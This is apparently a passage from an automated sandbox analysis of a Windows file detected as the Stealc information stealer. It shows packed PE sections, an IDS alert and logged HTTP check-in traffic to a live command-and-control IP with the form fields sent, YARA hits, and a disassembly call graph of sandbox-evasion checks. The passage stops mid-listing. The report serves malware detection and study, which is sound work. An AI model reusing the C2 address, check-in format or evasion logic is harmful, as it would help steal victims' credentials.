                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x2e70000x67600ca458fc852a3c0fc993f3c8a1e3de85aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x2ea0000x29a0000x200c17f98ae0bb9d23aee4a9c51b1d43245unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    lvyqwrnu0x5840000x19b0000x19a8002632de11e6015a50f95bd8b1ade5a3a3False0.994952444617844data7.954065080128192IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    fslmoltp0x71f0000x10000x600650ff108ec9bb825b22d376931631563False0.5859375data5.016154716857857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .taggant0x7200000x30000x2200b44a6f1f4a5810175253c34b9cf59cdfFalse0.07548253676470588DOS executable (COM)0.8900947642580371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Imports

                                    DLLImport
                                    kernel32.dlllstrcpy

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-31T05:06:59.243278+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649707185.215.113.20680TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 31, 2024 05:06:58.030554056 CET4970780192.168.2.6185.215.113.206
                                    Oct 31, 2024 05:06:58.035610914 CET8049707185.215.113.206192.168.2.6
                                    Oct 31, 2024 05:06:58.035698891 CET4970780192.168.2.6185.215.113.206
                                    Oct 31, 2024 05:06:58.037822962 CET4970780192.168.2.6185.215.113.206
                                    Oct 31, 2024 05:06:58.042606115 CET8049707185.215.113.206192.168.2.6
                                    Oct 31, 2024 05:06:58.951211929 CET8049707185.215.113.206192.168.2.6
                                    Oct 31, 2024 05:06:58.951283932 CET4970780192.168.2.6185.215.113.206
                                    Oct 31, 2024 05:06:58.956770897 CET4970780192.168.2.6185.215.113.206
                                    Oct 31, 2024 05:06:58.961630106 CET8049707185.215.113.206192.168.2.6
                                    Oct 31, 2024 05:06:59.243154049 CET8049707185.215.113.206192.168.2.6
                                    Oct 31, 2024 05:06:59.243278027 CET4970780192.168.2.6185.215.113.206
                                    Oct 31, 2024 05:07:02.655658007 CET4970780192.168.2.6185.215.113.206

                                    HTTP Request Dependency Graph

                                    • 185.215.113.206

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649707185.215.113.206805024C:\Users\user\Desktop\file.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 31, 2024 05:06:58.037822962 CET90OUTGET / HTTP/1.1
                                    Host: 185.215.113.206
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Oct 31, 2024 05:06:58.951211929 CET203INHTTP/1.1 200 OK
                                    Date: Thu, 31 Oct 2024 04:06:58 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Oct 31, 2024 05:06:58.956770897 CET412OUTPOST /6c4adf523b719729.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKF
                                    Host: 185.215.113.206
                                    Content-Length: 210
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 38 36 43 34 37 43 46 30 30 33 32 30 34 39 37 30 30 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 2d 2d 0d 0a
                                    Data Ascii: ------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="hwid"E586C47CF003204970075------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="build"tale------GCBGCAFIIECBFIDHIJKF--
                                    Oct 31, 2024 05:06:59.243154049 CET210INHTTP/1.1 200 OK
                                    Date: Thu, 31 Oct 2024 04:06:59 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 8
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                    Data Ascii: YmxvY2s=


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:00:06:52
                                    Start date:31/10/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0xac0000
                                    File size:2'120'192 bytes
                                    MD5 hash:1BD30BB80448545CC020F946EDA1D2F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2118707985.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:3.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:3.5%
                                      Total number of Nodes:1327
                                      Total number of Limit Nodes:24
                                      execution_graph 37600 ad6c90 37645 ac22a0 37600->37645 37624 ad6d04 37625 adacc0 4 API calls 37624->37625 37626 ad6d0b 37625->37626 37627 adacc0 4 API calls 37626->37627 37628 ad6d12 37627->37628 37629 adacc0 4 API calls 37628->37629 37630 ad6d19 37629->37630 37631 adacc0 4 API calls 37630->37631 37632 ad6d20 37631->37632 37797 adabb0 37632->37797 37634 ad6dac 37801 ad6bc0 GetSystemTime 37634->37801 37636 ad6d29 37636->37634 37638 ad6d62 OpenEventA 37636->37638 37640 ad6d79 37638->37640 37641 ad6d95 CloseHandle Sleep 37638->37641 37644 ad6d81 CreateEventA 37640->37644 37643 ad6daa 37641->37643 37642 ad6db6 CloseHandle ExitProcess 37643->37636 37644->37634 37998 ac4610 37645->37998 37647 ac22b4 37648 ac4610 2 API calls 37647->37648 37649 ac22cd 37648->37649 37650 ac4610 2 API calls 37649->37650 37651 ac22e6 37650->37651 37652 ac4610 2 API calls 37651->37652 37653 ac22ff 37652->37653 37654 ac4610 2 API calls 37653->37654 37655 ac2318 37654->37655 37656 ac4610 2 API calls 37655->37656 37657 ac2331 37656->37657 37658 ac4610 2 API calls 37657->37658 37659 ac234a 37658->37659 37660 ac4610 2 API calls 37659->37660 37661 ac2363 37660->37661 37662 ac4610 2 API calls 37661->37662 37663 ac237c 37662->37663 37664 ac4610 2 API calls 37663->37664 37665 ac2395 37664->37665 37666 ac4610 2 API calls 37665->37666 37667 ac23ae 37666->37667 37668 ac4610 2 API calls 37667->37668 37669 ac23c7 37668->37669 37670 ac4610 2 API calls 37669->37670 37671 ac23e0 37670->37671 37672 ac4610 2 API calls 37671->37672 37673 ac23f9 37672->37673 37674 ac4610 2 API calls 37673->37674 37675 ac2412 37674->37675 37676 ac4610 2 API calls 37675->37676 37677 ac242b 37676->37677 37678 ac4610 2 API calls 37677->37678 37679 ac2444 37678->37679 37680 ac4610 2 API calls 37679->37680 37681 ac245d 37680->37681 37682 ac4610 2 API calls 37681->37682 37683 ac2476 37682->37683 37684 ac4610 2 API calls 37683->37684 37685 ac248f 37684->37685 37686 ac4610 2 API calls 37685->37686 37687 ac24a8 37686->37687 37688 ac4610 2 API calls 37687->37688 37689 ac24c1 37688->37689 37690 ac4610 2 API calls 37689->37690 37691 ac24da 37690->37691 37692 ac4610 2 API calls 37691->37692 37693 ac24f3 37692->37693 37694 ac4610 2 API calls 37693->37694 37695 ac250c 37694->37695 37696 ac4610 2 API calls 37695->37696 37697 ac2525 37696->37697 37698 ac4610 2 API calls 37697->37698 37699 ac253e 37698->37699 37700 ac4610 2 API calls 37699->37700 37701 ac2557 37700->37701 37702 ac4610 2 API calls 37701->37702 37703 ac2570 37702->37703 37704 ac4610 2 API calls 37703->37704 37705 ac2589 37704->37705 37706 ac4610 2 API calls 37705->37706 37707 ac25a2 37706->37707 37708 ac4610 2 API calls 37707->37708 37709 ac25bb 37708->37709 37710 ac4610 2 API calls 37709->37710 37711 ac25d4 37710->37711 37712 ac4610 2 API calls 37711->37712 37713 ac25ed 37712->37713 37714 ac4610 2 API calls 37713->37714 37715 ac2606 37714->37715 37716 ac4610 2 API calls 37715->37716 37717 ac261f 37716->37717 37718 ac4610 2 API calls 37717->37718 37719 ac2638 37718->37719 37720 ac4610 2 API calls 37719->37720 37721 ac2651 37720->37721 37722 ac4610 2 API calls 37721->37722 37723 ac266a 37722->37723 37724 ac4610 2 API calls 37723->37724 37725 ac2683 37724->37725 37726 ac4610 2 API calls 37725->37726 37727 ac269c 37726->37727 37728 ac4610 2 API calls 37727->37728 37729 ac26b5 37728->37729 37730 ac4610 2 API calls 37729->37730 37731 ac26ce 37730->37731 37732 ad9bb0 37731->37732 38003 ad9aa0 GetPEB 37732->38003 37734 ad9bb8 37735 ad9bca 37734->37735 37736 ad9de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37734->37736 37739 ad9bdc 21 API calls 37735->37739 37737 ad9e5d 37736->37737 37738 ad9e44 GetProcAddress 37736->37738 37740 ad9e96 37737->37740 37741 ad9e66 GetProcAddress GetProcAddress 37737->37741 37738->37737 37739->37736 37742 ad9e9f GetProcAddress 37740->37742 37743 ad9eb8 37740->37743 37741->37740 37742->37743 37744 ad9ed9 37743->37744 37745 ad9ec1 GetProcAddress 37743->37745 37746 ad6ca0 37744->37746 37747 ad9ee2 GetProcAddress GetProcAddress 37744->37747 37745->37744 37748 adaa50 37746->37748 37747->37746 37750 adaa60 37748->37750 37749 ad6cad 37752 ac11d0 37749->37752 37750->37749 37751 adaa8e lstrcpy 37750->37751 37751->37749 37753 ac11e8 37752->37753 37754 ac120f ExitProcess 37753->37754 37755 ac1217 37753->37755 37756 ac1160 GetSystemInfo 37755->37756 37757 ac117c ExitProcess 37756->37757 37758 ac1184 37756->37758 37759 ac1110 GetCurrentProcess VirtualAllocExNuma 37758->37759 37760 ac1149 37759->37760 37761 ac1141 ExitProcess 37759->37761 38004 ac10a0 VirtualAlloc 37760->38004 37764 ac1220 38008 ad8b40 37764->38008 37767 ac129a 37770 ad6a10 GetUserDefaultLangID 37767->37770 37768 ac1249 __aulldiv 37768->37767 37769 ac1292 ExitProcess 37768->37769 37771 ad6a73 37770->37771 37772 ad6a32 37770->37772 37778 ac1190 37771->37778 37772->37771 37773 ad6a4d ExitProcess 37772->37773 37774 ad6a6b ExitProcess 37772->37774 37775 ad6a57 ExitProcess 37772->37775 37776 ad6a61 ExitProcess 37772->37776 37777 ad6a43 ExitProcess 37772->37777 37779 ad7a70 3 API calls 37778->37779 37781 ac119e 37779->37781 37780 ac11cc 37785 ad79e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37780->37785 37781->37780 37782 ad79e0 3 API calls 37781->37782 37783 ac11b7 37782->37783 37783->37780 37784 ac11c4 ExitProcess 37783->37784 37786 ad6cd0 37785->37786 37787 ad7a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37786->37787 37788 ad6ce3 37787->37788 37789 adacc0 37788->37789 38010 adaa20 37789->38010 37791 adacd1 lstrlen 37792 adacf0 37791->37792 37793 adad28 37792->37793 37795 adad0a lstrcpy lstrcat 37792->37795 38011 adaab0 37793->38011 37795->37793 37796 adad34 37796->37624 37798 adabcb 37797->37798 37799 adac1b 37798->37799 37800 adac09 lstrcpy 37798->37800 37799->37636 37800->37799 38015 ad6ac0 37801->38015 37803 ad6c2e 37804 ad6c38 sscanf 37803->37804 38044 adab10 37804->38044 37806 ad6c4a SystemTimeToFileTime SystemTimeToFileTime 37807 ad6c6e 37806->37807 37808 ad6c80 37806->37808 37807->37808 37809 ad6c78 ExitProcess 37807->37809 37810 ad5d60 37808->37810 37811 ad5d6d 37810->37811 37812 adaa50 lstrcpy 37811->37812 37813 ad5d7e 37812->37813 38046 adab30 lstrlen 37813->38046 37816 adab30 2 API calls 37817 ad5db4 37816->37817 37818 adab30 2 API calls 37817->37818 37819 ad5dc4 37818->37819 38050 ad6680 37819->38050 37822 adab30 2 API calls 37823 ad5de3 37822->37823 37824 adab30 2 API calls 37823->37824 37825 ad5df0 37824->37825 37826 adab30 2 API calls 37825->37826 37827 ad5dfd 37826->37827 37828 adab30 2 API calls 37827->37828 37829 ad5e49 37828->37829 38059 ac26f0 37829->38059 37837 ad5f13 37838 ad6680 lstrcpy 37837->37838 37839 ad5f25 37838->37839 37840 adaab0 lstrcpy 37839->37840 37841 ad5f42 37840->37841 37842 adacc0 4 API calls 37841->37842 37843 ad5f5a 37842->37843 37844 adabb0 lstrcpy 37843->37844 37845 ad5f66 37844->37845 37846 adacc0 4 API calls 37845->37846 37847 ad5f8a 37846->37847 37848 adabb0 lstrcpy 37847->37848 37849 ad5f96 37848->37849 37850 adacc0 4 API calls 37849->37850 37851 ad5fba 37850->37851 37852 adabb0 lstrcpy 37851->37852 37853 ad5fc6 37852->37853 37854 adaa50 lstrcpy 37853->37854 37855 ad5fee 37854->37855 38785 ad7690 GetWindowsDirectoryA 37855->38785 37858 adaab0 lstrcpy 37859 ad6008 37858->37859 38795 ac48d0 37859->38795 37861 ad600e 38940 ad19f0 37861->38940 37863 ad6016 37864 adaa50 lstrcpy 37863->37864 37865 ad6039 37864->37865 37866 ac1590 lstrcpy 37865->37866 37867 ad604d 37866->37867 38956 ac59b0 34 API calls ctype 37867->38956 37869 ad6053 38957 ad1280 lstrlen lstrcpy 37869->38957 37871 ad605e 37872 adaa50 lstrcpy 37871->37872 37873 ad6082 37872->37873 37874 ac1590 lstrcpy 37873->37874 37875 ad6096 37874->37875 38958 ac59b0 34 API calls ctype 37875->38958 37877 ad609c 38959 ad0fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 37877->38959 37879 ad60a7 37880 adaa50 lstrcpy 37879->37880 37881 ad60c9 37880->37881 37882 ac1590 lstrcpy 37881->37882 37883 ad60dd 37882->37883 38960 ac59b0 34 API calls ctype 37883->38960 37885 ad60e3 38961 ad1170 StrCmpCA lstrlen lstrcpy 37885->38961 37887 ad60ee 37888 ac1590 lstrcpy 37887->37888 37889 ad6105 37888->37889 38962 ad1c60 115 API calls 37889->38962 37891 ad610a 37892 adaa50 lstrcpy 37891->37892 37893 ad6126 37892->37893 38963 ac5000 7 API calls 37893->38963 37895 ad612b 37896 ac1590 lstrcpy 37895->37896 37897 ad61ab 37896->37897 38964 ad08a0 287 API calls 37897->38964 37899 ad61b0 37900 adaa50 lstrcpy 37899->37900 37901 ad61d6 37900->37901 37902 ac1590 lstrcpy 37901->37902 37903 ad61ea 37902->37903 38965 ac59b0 34 API calls ctype 37903->38965 37905 ad61f0 38966 ad13c0 StrCmpCA lstrlen lstrcpy 37905->38966 37907 ad61fb 37908 ac1590 lstrcpy 37907->37908 37909 ad623b 37908->37909 38967 ac1ec0 59 API calls 37909->38967 37911 ad6240 37912 ad6250 37911->37912 37913 ad62e2 37911->37913 37914 adaa50 lstrcpy 37912->37914 37915 adaab0 lstrcpy 37913->37915 37916 ad6270 37914->37916 37917 ad62f5 37915->37917 37919 ac1590 lstrcpy 37916->37919 37918 ac1590 lstrcpy 37917->37918 37920 ad6309 37918->37920 37921 ad6284 37919->37921 38971 ac59b0 34 API calls ctype 37920->38971 38968 ac59b0 34 API calls ctype 37921->38968 37924 ad630f 38972 ad37b0 31 API calls 37924->38972 37925 ad628a 38969 ad1520 19 API calls ctype 37925->38969 37928 ad62da 37931 ad635b 37928->37931 37934 ac1590 lstrcpy 37928->37934 37929 ad6295 37930 ac1590 lstrcpy 37929->37930 37932 ad62d5 37930->37932 37933 ad6380 37931->37933 37936 ac1590 lstrcpy 37931->37936 38970 ad4010 67 API calls 37932->38970 37937 ad63a5 37933->37937 37940 ac1590 lstrcpy 37933->37940 37938 ad6337 37934->37938 37939 ad637b 37936->37939 37942 ad63ca 37937->37942 37947 ac1590 lstrcpy 37937->37947 38973 ad4300 58 API calls ctype 37938->38973 38975 ad49d0 88 API calls ctype 37939->38975 37945 ad63a0 37940->37945 37943 ad63ef 37942->37943 37948 ac1590 lstrcpy 37942->37948 37949 ad6414 37943->37949 37955 ac1590 lstrcpy 37943->37955 38976 ad4e00 61 API calls ctype 37945->38976 37946 ad633c 37951 ac1590 lstrcpy 37946->37951 37952 ad63c5 37947->37952 37954 ad63ea 37948->37954 37957 ad6439 37949->37957 37958 ac1590 lstrcpy 37949->37958 37956 ad6356 37951->37956 38977 ad4fc0 65 API calls 37952->38977 38978 ad5190 63 API calls ctype 37954->38978 37961 ad640f 37955->37961 38974 ad5350 44 API calls 37956->38974 37959 ad6460 37957->37959 37964 ac1590 lstrcpy 37957->37964 37963 ad6434 37958->37963 37965 ad6470 37959->37965 37966 ad6503 37959->37966 38979 ac7770 107 API calls ctype 37961->38979 38980 ad52a0 61 API calls ctype 37963->38980 37969 ad6459 37964->37969 37971 adaa50 lstrcpy 37965->37971 37970 adaab0 lstrcpy 37966->37970 38981 ad91a0 46 API calls ctype 37969->38981 37973 ad6516 37970->37973 37974 ad6491 37971->37974 37975 ac1590 lstrcpy 37973->37975 37976 ac1590 lstrcpy 37974->37976 37977 ad652a 37975->37977 37978 ad64a5 37976->37978 38985 ac59b0 34 API calls ctype 37977->38985 38982 ac59b0 34 API calls ctype 37978->38982 37981 ad64ab 38983 ad1520 19 API calls ctype 37981->38983 37982 ad6530 38986 ad37b0 31 API calls 37982->38986 37985 ad64fb 37988 adaab0 lstrcpy 37985->37988 37986 ad64b6 37987 ac1590 lstrcpy 37986->37987 37989 ad64f6 37987->37989 37990 ad654c 37988->37990 38984 ad4010 67 API calls 37989->38984 37992 ac1590 lstrcpy 37990->37992 37993 ad6560 37992->37993 38987 ac59b0 34 API calls ctype 37993->38987 37995 ad656c 37997 ad6588 37995->37997 38988 ad68d0 9 API calls ctype 37995->38988 37997->37642 37999 ac4621 RtlAllocateHeap 37998->37999 38001 ac4671 VirtualProtect 37999->38001 38001->37647 38003->37734 38005 ac10c2 ctype 38004->38005 38006 ac10fd 38005->38006 38007 ac10e2 VirtualFree 38005->38007 38006->37764 38007->38006 38009 ac1233 GlobalMemoryStatusEx 38008->38009 38009->37768 38010->37791 38013 adaad2 38011->38013 38012 adaafc 38012->37796 38013->38012 38014 adaaea lstrcpy 38013->38014 38014->38012 38016 adaa50 lstrcpy 38015->38016 38017 ad6ad3 38016->38017 38018 adacc0 4 API calls 38017->38018 38019 ad6ae5 38018->38019 38020 adabb0 lstrcpy 38019->38020 38021 ad6aee 38020->38021 38022 adacc0 4 API calls 38021->38022 38023 ad6b07 38022->38023 38024 adabb0 lstrcpy 38023->38024 38025 ad6b10 38024->38025 38026 adacc0 4 API calls 38025->38026 38027 ad6b2a 38026->38027 38028 adabb0 lstrcpy 38027->38028 38029 ad6b33 38028->38029 38030 adacc0 4 API calls 38029->38030 38031 ad6b4c 38030->38031 38032 adabb0 lstrcpy 38031->38032 38033 ad6b55 38032->38033 38034 adacc0 4 API calls 38033->38034 38035 ad6b6f 38034->38035 38036 adabb0 lstrcpy 38035->38036 38037 ad6b78 38036->38037 38038 adacc0 4 API calls 38037->38038 38039 ad6b93 38038->38039 38040 adabb0 lstrcpy 38039->38040 38041 ad6b9c 38040->38041 38042 adaab0 lstrcpy 38041->38042 38043 ad6bb0 38042->38043 38043->37803 38045 adab22 38044->38045 38045->37806 38047 adab4f 38046->38047 38048 ad5da4 38047->38048 38049 adab8b lstrcpy 38047->38049 38048->37816 38049->38048 38051 adabb0 lstrcpy 38050->38051 38052 ad6693 38051->38052 38053 adabb0 lstrcpy 38052->38053 38054 ad66a5 38053->38054 38055 adabb0 lstrcpy 38054->38055 38056 ad66b7 38055->38056 38057 adabb0 lstrcpy 38056->38057 38058 ad5dd6 38057->38058 38058->37822 38060 ac4610 2 API calls 38059->38060 38061 ac2704 38060->38061 38062 ac4610 2 API calls 38061->38062 38063 ac2727 38062->38063 38064 ac4610 2 API calls 38063->38064 38065 ac2740 38064->38065 38066 ac4610 2 API calls 38065->38066 38067 ac2759 38066->38067 38068 ac4610 2 API calls 38067->38068 38069 ac2786 38068->38069 38070 ac4610 2 API calls 38069->38070 38071 ac279f 38070->38071 38072 ac4610 2 API calls 38071->38072 38073 ac27b8 38072->38073 38074 ac4610 2 API calls 38073->38074 38075 ac27e5 38074->38075 38076 ac4610 2 API calls 38075->38076 38077 ac27fe 38076->38077 38078 ac4610 2 API calls 38077->38078 38079 ac2817 38078->38079 38080 ac4610 2 API calls 38079->38080 38081 ac2830 38080->38081 38082 ac4610 2 API calls 38081->38082 38083 ac2849 38082->38083 38084 ac4610 2 API calls 38083->38084 38085 ac2862 38084->38085 38086 ac4610 2 API calls 38085->38086 38087 ac287b 38086->38087 38088 ac4610 2 API calls 38087->38088 38089 ac2894 38088->38089 38090 ac4610 2 API calls 38089->38090 38091 ac28ad 38090->38091 38092 ac4610 2 API calls 38091->38092 38093 ac28c6 38092->38093 38094 ac4610 2 API calls 38093->38094 38095 ac28df 38094->38095 38096 ac4610 2 API calls 38095->38096 38097 ac28f8 38096->38097 38098 ac4610 2 API calls 38097->38098 38099 ac2911 38098->38099 38100 ac4610 2 API calls 38099->38100 38101 ac292a 38100->38101 38102 ac4610 2 API calls 38101->38102 38103 ac2943 38102->38103 38104 ac4610 2 API calls 38103->38104 38105 ac295c 38104->38105 38106 ac4610 2 API calls 38105->38106 38107 ac2975 38106->38107 38108 ac4610 2 API calls 38107->38108 38109 ac298e 38108->38109 38110 ac4610 2 API calls 38109->38110 38111 ac29a7 38110->38111 38112 ac4610 2 API calls 38111->38112 38113 ac29c0 38112->38113 38114 ac4610 2 API calls 38113->38114 38115 ac29d9 38114->38115 38116 ac4610 2 API calls 38115->38116 38117 ac29f2 38116->38117 38118 ac4610 2 API calls 38117->38118 38119 ac2a0b 38118->38119 38120 ac4610 2 API calls 38119->38120 38121 ac2a24 38120->38121 38122 ac4610 2 API calls 38121->38122 38123 ac2a3d 38122->38123 38124 ac4610 2 API calls 38123->38124 38125 ac2a56 38124->38125 38126 ac4610 2 API calls 38125->38126 38127 ac2a6f 38126->38127 38128 ac4610 2 API calls 38127->38128 38129 ac2a88 38128->38129 38130 ac4610 2 API calls 38129->38130 38131 ac2aa1 38130->38131 38132 ac4610 2 API calls 38131->38132 38133 ac2aba 38132->38133 38134 ac4610 2 API calls 38133->38134 38135 ac2ad3 38134->38135 38136 ac4610 2 API calls 38135->38136 38137 ac2aec 38136->38137 38138 ac4610 2 API calls 38137->38138 38139 ac2b05 38138->38139 38140 ac4610 2 API calls 38139->38140 38141 ac2b1e 38140->38141 38142 ac4610 2 API calls 38141->38142 38143 ac2b37 38142->38143 38144 ac4610 2 API calls 38143->38144 38145 ac2b50 38144->38145 38146 ac4610 2 API calls 38145->38146 38147 ac2b69 38146->38147 38148 ac4610 2 API calls 38147->38148 38149 ac2b82 38148->38149 38150 ac4610 2 API calls 38149->38150 38151 ac2b9b 38150->38151 38152 ac4610 2 API calls 38151->38152 38153 ac2bb4 38152->38153 38154 ac4610 2 API calls 38153->38154 38155 ac2bcd 38154->38155 38156 ac4610 2 API calls 38155->38156 38157 ac2be6 38156->38157 38158 ac4610 2 API calls 38157->38158 38159 ac2bff 38158->38159 38160 ac4610 2 API calls 38159->38160 38161 ac2c18 38160->38161 38162 ac4610 2 API calls 38161->38162 38163 ac2c31 38162->38163 38164 ac4610 2 API calls 38163->38164 38165 ac2c4a 38164->38165 38166 ac4610 2 API calls 38165->38166 38167 ac2c63 38166->38167 38168 ac4610 2 API calls 38167->38168 38169 ac2c7c 38168->38169 38170 ac4610 2 API calls 38169->38170 38171 ac2c95 38170->38171 38172 ac4610 2 API calls 38171->38172 38173 ac2cae 38172->38173 38174 ac4610 2 API calls 38173->38174 38175 ac2cc7 38174->38175 38176 ac4610 2 API calls 38175->38176 38177 ac2ce0 38176->38177 38178 ac4610 2 API calls 38177->38178 38179 ac2cf9 38178->38179 38180 ac4610 2 API calls 38179->38180 38181 ac2d12 38180->38181 38182 ac4610 2 API calls 38181->38182 38183 ac2d2b 38182->38183 38184 ac4610 2 API calls 38183->38184 38185 ac2d44 38184->38185 38186 ac4610 2 API calls 38185->38186 38187 ac2d5d 38186->38187 38188 ac4610 2 API calls 38187->38188 38189 ac2d76 38188->38189 38190 ac4610 2 API calls 38189->38190 38191 ac2d8f 38190->38191 38192 ac4610 2 API calls 38191->38192 38193 ac2da8 38192->38193 38194 ac4610 2 API calls 38193->38194 38195 ac2dc1 38194->38195 38196 ac4610 2 API calls 38195->38196 38197 ac2dda 38196->38197 38198 ac4610 2 API calls 38197->38198 38199 ac2df3 38198->38199 38200 ac4610 2 API calls 38199->38200 38201 ac2e0c 38200->38201 38202 ac4610 2 API calls 38201->38202 38203 ac2e25 38202->38203 38204 ac4610 2 API calls 38203->38204 38205 ac2e3e 38204->38205 38206 ac4610 2 API calls 38205->38206 38207 ac2e57 38206->38207 38208 ac4610 2 API calls 38207->38208 38209 ac2e70 38208->38209 38210 ac4610 2 API calls 38209->38210 38211 ac2e89 38210->38211 38212 ac4610 2 API calls 38211->38212 38213 ac2ea2 38212->38213 38214 ac4610 2 API calls 38213->38214 38215 ac2ebb 38214->38215 38216 ac4610 2 API calls 38215->38216 38217 ac2ed4 38216->38217 38218 ac4610 2 API calls 38217->38218 38219 ac2eed 38218->38219 38220 ac4610 2 API calls 38219->38220 38221 ac2f06 38220->38221 38222 ac4610 2 API calls 38221->38222 38223 ac2f1f 38222->38223 38224 ac4610 2 API calls 38223->38224 38225 ac2f38 38224->38225 38226 ac4610 2 API calls 38225->38226 38227 ac2f51 38226->38227 38228 ac4610 2 API calls 38227->38228 38229 ac2f6a 38228->38229 38230 ac4610 2 API calls 38229->38230 38231 ac2f83 38230->38231 38232 ac4610 2 API calls 38231->38232 38233 ac2f9c 38232->38233 38234 ac4610 2 API calls 38233->38234 38235 ac2fb5 38234->38235 38236 ac4610 2 API calls 38235->38236 38237 ac2fce 38236->38237 38238 ac4610 2 API calls 38237->38238 38239 ac2fe7 38238->38239 38240 ac4610 2 API calls 38239->38240 38241 ac3000 38240->38241 38242 ac4610 2 API calls 38241->38242 38243 ac3019 38242->38243 38244 ac4610 2 API calls 38243->38244 38245 ac3032 38244->38245 38246 ac4610 2 API calls 38245->38246 38247 ac304b 38246->38247 38248 ac4610 2 API calls 38247->38248 38249 ac3064 38248->38249 38250 ac4610 2 API calls 38249->38250 38251 ac307d 38250->38251 38252 ac4610 2 API calls 38251->38252 38253 ac3096 38252->38253 38254 ac4610 2 API calls 38253->38254 38255 ac30af 38254->38255 38256 ac4610 2 API calls 38255->38256 38257 ac30c8 38256->38257 38258 ac4610 2 API 